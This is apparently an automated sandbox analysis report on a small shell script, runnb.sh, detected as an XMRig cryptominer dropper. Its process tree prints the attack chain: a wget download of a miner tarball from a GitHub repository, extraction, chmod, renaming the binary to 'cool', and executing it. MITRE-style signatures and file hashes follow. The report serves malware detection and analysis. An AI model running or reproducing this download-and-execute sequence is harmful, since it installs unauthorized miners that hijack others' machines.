Analysis
-
max time kernel
1799s -
max time network
1795s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240611-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
30-10-2024 08:21
Static task
static1
Behavioral task
behavioral1
Sample
runnb.sh
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral2
Sample
runnb.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral3
Sample
runnb.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
runnb.sh
-
Size
213B
-
MD5
a1189543e2f98f6696c6d857b899ab0a
-
SHA1
30b167128357a05cb5ae4d8bd386d63839d99c4d
-
SHA256
a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
-
SHA512
472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule /tmp/xmrig-6.22.0/xmrig family_xmrig /tmp/xmrig-6.22.0/xmrig xmrig -
Xmrig family
-
Xmrig_linux family
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 1500 chmod -
Executes dropped EXE 1 IoCs
Processes:
coolioc pid process /tmp/xmrig-6.22.0/cool 1502 cool -
OS Credential Dumping 1 TTPs 1 IoCs
Adversaries may attempt to dump credentials to use it in password cracking.
Processes:
sudodescription ioc process File opened for reading /etc/shadow sudo -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
Processes:
cooldescription ioc process File opened for reading /sys/devices/virtual/dmi/id/product_name cool File opened for reading /sys/devices/virtual/dmi/id/board_vendor cool File opened for reading /sys/devices/virtual/dmi/id/bios_vendor cool File opened for reading /sys/devices/virtual/dmi/id/sys_vendor cool -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 8 raw.githubusercontent.com 6 raw.githubusercontent.com 7 raw.githubusercontent.com -
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
Processes:
cooldescription ioc process File opened for reading /sys/devices/virtual/dmi/id/product_uuid cool File opened for reading /sys/devices/virtual/dmi/id/chassis_serial cool File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag cool File opened for reading /sys/devices/virtual/dmi/id/bios_version cool File opened for reading /sys/devices/virtual/dmi/id/product_version cool File opened for reading /sys/devices/virtual/dmi/id/product_serial cool File opened for reading /sys/devices/virtual/dmi/id/board_name cool File opened for reading /sys/devices/virtual/dmi/id/board_version cool File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag cool File opened for reading /sys/devices/virtual/dmi/id/chassis_type cool File opened for reading /sys/devices/virtual/dmi/id/board_serial cool File opened for reading /sys/devices/virtual/dmi/id/chassis_version cool File opened for reading /sys/devices/virtual/dmi/id/bios_date cool File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor cool -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
cooldescription ioc process File opened for reading /proc/cpuinfo cool -
Reads CPU attributes 1 TTPs 45 IoCs
Processes:
cooldescription ioc process File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/id cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/id cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/id cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/type cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map cool File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/type cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/id cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map cool File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/base_frequency cool File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity cool File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus cool File opened for reading /sys/devices/system/cpu/cpu0/topology/physical_package_id cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/level cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/type cool File opened for reading /sys/devices/system/cpu/cpu0/topology/package_cpus cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/type cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/size cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/level cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map cool File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/size cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition cool File opened for reading /sys/devices/system/cpu/cpu0/topology/core_cpus cool File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map cool File opened for reading /sys/devices/system/cpu/online cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/level cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map cool File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map cool File opened for reading /sys/devices/system/cpu/possible cool -
Enumerates kernel/hardware configuration 1 TTPs 33 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
coolsnapsnapsnapsnapsnapsnapsnapsnapdescription ioc process File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency cool File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages cool File opened for reading /sys/devices/system/node/node0/meminfo cool File opened for reading /sys/devices/system/node/node0/hugepages cool File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/bus/soc/devices cool File opened for reading /sys/devices/cpu_atom/cpus cool File opened for reading /sys/firmware/dmi/tables/smbios_entry_point cool File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/fs/cgroup/unified/cgroup.controllers cool File opened for reading /sys/devices/cpu_core/cpus cool File opened for reading /sys/devices/system/node/node0/cpumap cool File opened for reading /sys/devices/virtual/dmi/id cool File opened for reading /sys/firmware/dmi/tables/DMI cool File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages cool File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth cool File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency cool File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/bus/dax/devices cool File opened for reading /sys/devices/system/node/node0/access1/initiators cool File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus cool File opened for reading /sys/devices/system/node/online cool File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages cool File opened for reading /sys/devices/system/node/node0/access0/initiators cool File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth cool File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size snap File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems cool File opened for reading /sys/devices/system/cpu cool File opened for reading /sys/kernel/mm/hugepages cool -
Processes:
snapcoolsudosnapsnapdpkgsnapsnapdpkgsnapdpkgsnapaptdpkgaptmvsnaptardescription ioc process File opened for reading /proc/cgroups snap File opened for reading /proc/cmdline snap File opened for reading /proc/mounts cool File opened for reading /proc/sys/vm/nr_hugepages cool File opened for reading /proc/filesystems sudo File opened for reading /proc/cmdline snap File opened for reading /proc/cmdline cool File opened for reading /proc/self/cpuset cool File opened for reading /proc/driver/nvidia/gpus cool File opened for reading /proc/cgroups snap File opened for reading /proc/filesystems dpkg File opened for reading /proc/cgroups snap File opened for reading /proc/cmdline snap File opened for reading /proc/version_signature cool File opened for reading /proc/self/stat sudo File opened for reading /proc/filesystems dpkg File opened for reading /proc/cgroups snap File opened for reading /proc/filesystems dpkg File opened for reading /proc/cgroups snap File opened for reading /proc/cmdline snap File opened for reading /proc/meminfo cool File opened for reading /proc/self/fd sudo File opened for reading /proc/1389/status apt File opened for reading /proc/filesystems dpkg File opened for reading /proc/cmdline snap File opened for reading /proc/self/fd apt File opened for reading /proc/cmdline snap File opened for reading /proc/self/fd apt File opened for reading /proc/cmdline snap File opened for reading /proc/cgroups snap File opened for reading /proc/filesystems mv File opened for reading /proc/sys/kernel/ngroups_max sudo File opened for reading /proc/cmdline snap File opened for reading /proc/cgroups snap File opened for reading /proc/filesystems tar File opened for reading /proc/cgroups snap -
Writes file to tmp directory 37 IoCs
Malware often drops required files in the /tmp directory.
Processes:
aptapttarwgetcooldescription ioc process File opened for modification /tmp/clearsigned.message.sHlZBQ apt File opened for modification /tmp/clearsigned.message.NLH6hQ apt File opened for modification /tmp/clearsigned.message.eXVyBP apt File opened for modification /tmp/clearsigned.message.Nh45QQ apt File opened for modification /tmp/clearsigned.message.nkEwvR apt File opened for modification /tmp/clearsigned.message.HpjyOQ apt File opened for modification /tmp/clearsigned.message.xDwrqP apt File opened for modification /tmp/xmrig-6.22.0/config.json tar File opened for modification /tmp/clearsigned.message.zO5LgP apt File opened for modification /tmp/clearsigned.message.d8fZuP apt File opened for modification /tmp/clearsigned.message.SkuyaR apt File opened for modification /tmp/clearsigned.message.RGSS6P apt File opened for modification /tmp/clearsigned.message.1QfVvQ apt File opened for modification /tmp/clearsigned.message.tbaUtR apt File opened for modification /tmp/xmrig-6.22.0/xmrig tar File opened for modification /tmp/clearsigned.message.INo2BO apt File opened for modification /tmp/clearsigned.message.lOSlCN apt File opened for modification /tmp/clearsigned.message.4NLa4Q apt File opened for modification /tmp/clearsigned.message.DZKguO apt File opened for modification /tmp/clearsigned.message.xfPFpQ apt File opened for modification /tmp/clearsigned.message.TNKGZM apt File opened for modification /tmp/clearsigned.message.jeJIWQ apt File opened for modification /tmp/xmrigtar.tar.gz wget File opened for modification /tmp/clearsigned.message.JVYsYR apt File opened for modification /tmp/clearsigned.message.iX0JBN apt File opened for modification /tmp/clearsigned.message.0yBrXN apt File opened for modification /tmp/clearsigned.message.0phQ6Q apt File opened for modification /tmp/clearsigned.message.stIwqQ apt File opened for modification /tmp/clearsigned.message.k6eZYN apt File opened for modification /tmp/clearsigned.message.LkxZkO apt File opened for modification /tmp/clearsigned.message.ulmCkP apt File opened for modification /tmp/clearsigned.message.MBVB9O apt File opened for modification /tmp/clearsigned.message.LvdfkN apt File opened for modification /tmp/xmrig-6.22.0/SHA256SUMS tar File opened for modification /tmp/xmrig-6.22.0/config.json cool File opened for modification /tmp/clearsigned.message.5ukbVQ apt File opened for modification /tmp/clearsigned.message.kctNGP apt
Processes
-
/tmp/runnb.sh/tmp/runnb.sh1⤵PID:1395
-
/usr/bin/sudosudo apt install wget2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:1396 -
/usr/bin/aptapt install wget3⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1397 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:1398 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:1438 -
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"4⤵PID:1439
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1440 -
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"4⤵PID:1445
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1446 -
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"4⤵PID:1451
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1452 -
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"4⤵PID:1457
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1458 -
/usr/bin/aptapt install wget2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1463 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:1464 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:1465 -
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"3⤵PID:1466
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1467 -
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"3⤵PID:1474
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1475 -
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"3⤵PID:1482
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1483 -
/bin/sh/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"3⤵PID:1488
-
/usr/bin/snap/usr/bin/snap advise-snap --from-apt4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1489 -
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz2⤵
- Writes file to tmp directory
PID:1497 -
/usr/bin/tartar xvf xmrigtar.tar.gz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1498 -
/usr/local/sbin/gzipgzip -d3⤵PID:1499
-
/usr/local/bin/gzipgzip -d3⤵PID:1499
-
/usr/sbin/gzipgzip -d3⤵PID:1499
-
/usr/bin/gzipgzip -d3⤵PID:1499
-
/usr/bin/chmodchmod +x xmrig2⤵
- File and Directory Permissions Modification
PID:1500 -
/usr/bin/mvmv xmrig cool2⤵
- Reads runtime system information
PID:1501 -
/tmp/xmrig-6.22.0/cool./cool2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1502
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
2System Checks
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
215B
MD55765050c897846ac422c9c950538cf5f
SHA186954396fd2b3187085ac5081ce31af915aad1ba
SHA25659a5b09891186b1d191a6f0344071aa2778416813b5a2f3d1441bf217317bf5b
SHA512b06cc85dc7b7d71373caf9f54251cea18b61ee367c8c4e94fd019171337092591818999239c4ce5cb93d166b5e388b49fb8b077ca6f7bd40298e2aaa9f1b6d58
-
Filesize
257KB
MD5f7baae962e2417343c0d68864dea6b69
SHA1014599a6b6aff7497bc72d0f6ae30f7aa6383c1a
SHA25652486e27d87061aa66607e1c03ab199be5658c67d4f166c20793ded09859bd6f
SHA512fc0fca14d6752a81dfb433846e08ece181a51f72210126d935b6dde959aba36a04f5a92c2a0c2927c47e646807438f588b3f04f616ea34a10204baf54541bf23
-
Filesize
150B
MD519f1bb08cf8997837b1f738b76ca97e9
SHA1c497499ad539d6ef580c6c932a2633fe820abded
SHA25699ca11102d0994a98a76722b325f3215b30d3b3df3d722a2baebf6f9944566fa
SHA512fbb742f0fa67720e798b493a5e5ba5e72cbdde3c0ea55cfc0704f93ab97c586434a3e029f6e1e3ed655da997649aa8e9caf352018b87457755f75ca1bfe50230
-
Filesize
1KB
MD51879742a3f028a8e227f3b6b51756269
SHA120365c0cf35e787f525baede3646cfdfe6001cba
SHA2564042908287a7c60eb515d2c180a03d25156b4001af6cba1ad823461cc86751c5
SHA512e7d918532dd029a53b803df0df2e4e61416e18b58ffabe18b542cd30b111f266e98d73aad8ffe62a79af50e4f21d7e19415ee03ff104eb36aaad2cf1903e9731
-
Filesize
919B
MD50a9b0011891eae4086d16c3364e772ff
SHA198fe8a7b5b6b0c0aa7635e4e388c67c863772b69
SHA2561aa77bd6697d36e345cd7c0769613e9798106b0fed206d7f766e846b63aa10fd
SHA5129e1791e92d71b539aac8f944a3db65708ebfca102f16e3e7af429aaea1446be781c4ec5cb740a163dbc11a3bdacfed36d21262e05fcf29d896beb06ce0d59554
-
Filesize
7.9MB
MD551f989c19819a0a0625c251df6affe95
SHA13b27c895b6f9665f9287510207bfcdcb7fe6e059
SHA256fd11982f252c060a1372e81d5be57589647052b56281a5c54975ca22164f7726
SHA512ec8ce7d1960f9ae564d5654a35e2ad108ed900f3f56b38dfe4601be0db49c1a3cd9c643307b72c2bfc0c157d2640a62343cd7377f68d29327104e0e78b4bdfbd
-
Filesize
3.4MB
MD5ccdb2d76041e107dff38f962d65b3d4b
SHA1e9360c43398f3725b0a3eb87e2448ac416d96be3
SHA25611d52ee20c865f6b0b7787bfe7a06d7ce0d865e041552365b9a026a0d24cc18f
SHA512f6b090c698cb1092bf10010bbe00fed0388e7117b8397cf3113a23271bb514d0d03b559de721896994b472f26f9e3aeeddc2877d71bcc7830313e97d2171033d